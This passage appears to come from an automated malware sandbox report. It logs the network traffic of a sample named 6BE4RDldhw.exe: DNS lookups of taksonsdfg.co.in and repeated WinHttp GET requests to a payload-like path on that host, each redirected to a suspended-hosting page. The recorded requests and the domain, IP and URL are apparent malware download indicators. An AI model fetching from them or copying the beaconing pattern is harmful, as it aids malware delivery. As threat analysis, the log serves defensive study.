Nov 26, 2024 08:14:11.433979034 CET	50046	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:14:11.434046030 CET	50046	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:14:11.434065104 CET	443	50046	108.170.55.202	192.168.2.7
Nov 26, 2024 08:14:11.434075117 CET	50046	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:14:11.434081078 CET	443	50046	108.170.55.202	192.168.2.7
Nov 26, 2024 08:14:11.644110918 CET	50051	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:14:11.644171000 CET	443	50051	108.170.55.202	192.168.2.7
Nov 26, 2024 08:14:11.644262075 CET	50051	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:14:11.646184921 CET	50051	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:14:11.646228075 CET	443	50051	108.170.55.202	192.168.2.7
Nov 26, 2024 08:14:11.646584034 CET	50051	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:14:11.658982038 CET	50052	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:14:11.659022093 CET	443	50052	108.170.55.202	192.168.2.7
Nov 26, 2024 08:14:11.659092903 CET	50052	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:14:11.659377098 CET	50052	443	192.168.2.7	108.170.55.202
Nov 26, 2024 08:14:11.659389973 CET	443	50052	108.170.55.202	192.168.2.7
Nov 26, 2024 08:14:13.037019968 CET	443	50052	108.170.55.202	192.168.2.7
Nov 26, 2024 08:14:13.037106037 CET	50052	443	192.168.2.7	108.170.55.202

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 08:12:09.141820908 CET	58868	53	192.168.2.7	1.1.1.1
Nov 26, 2024 08:12:10.006603003 CET	53	58868	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 26, 2024 08:12:09.141820908 CET	192.168.2.7	1.1.1.1	0xf466	Standard query (0)	taksonsdfg.co.in	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 26, 2024 08:12:10.006603003 CET	1.1.1.1	192.168.2.7	0xf466	No error (0)	taksonsdfg.co.in		108.170.55.202	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

taksonsdfg.co.in

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49702	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:11 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:11 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:12:11 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:11 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49708	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:13 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:14 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:12:13 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:14 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:12:14 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:12:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49715	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:15 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:16 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:12:15 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:16 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49721	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:17 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:18 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:12:17 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:18 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:12:18 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:12:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49728	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:19 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:20 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:12:20 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:20 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49729	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:21 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:22 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:12:22 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:22 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:12:22 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:12:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49737	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:24 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:24 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:12:24 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:24 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49744	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:25 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:26 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:12:26 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:26 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:12:26 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:12:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49752	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:12:28 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:12:29 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:12:28 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:12:29 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

